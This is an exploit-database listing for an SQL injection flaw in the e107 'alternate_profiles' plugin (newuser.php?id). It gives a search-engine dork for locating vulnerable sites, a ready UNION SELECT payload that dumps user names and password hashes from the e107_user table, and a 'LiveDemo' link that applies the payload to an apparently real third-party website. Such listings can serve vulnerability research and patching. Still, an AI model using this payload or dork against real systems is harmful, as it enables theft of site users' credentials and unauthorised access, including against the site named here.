[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

e107 Plugin alternate_profiles (id) SQL Injection Vulnerability

Author
boom3rang
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3961
Category
web applications
Date add
27-10-2008
Platform
unsorted
===============================================================
e107 Plugin alternate_profiles (id) SQL Injection Vulnerability
===============================================================


#############################################################
e107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability
#############################################################
[~] Author boom3rang
--------------------------------
[!] Script Name: E107
[!] Plugin Vuln: alternate_profiles/newuser.php?id=
[!] Dork:  inurl:"/alternate_profiles/
#############################################################

---------------------------------------------------------------------------------------------------
[-] POC:
http://localhost/e107_plugins/alternate_profiles/newuser.php?id=[exploit]
---------------------------------------------------------------------------------------------------
[-] Exploit:
-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
---------------------------------------------------------------------------------------------------
[-] LiveDemo:
http://briefcaseit.com/e107_plugins/alternate_profiles/newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
---------------------------------------------------------------------------------------------------
#########################################
- United States of Albania
- Proud to be Albanian
- Proud to be Muslim
#########################################




#  0day.today [2024-12-24]  #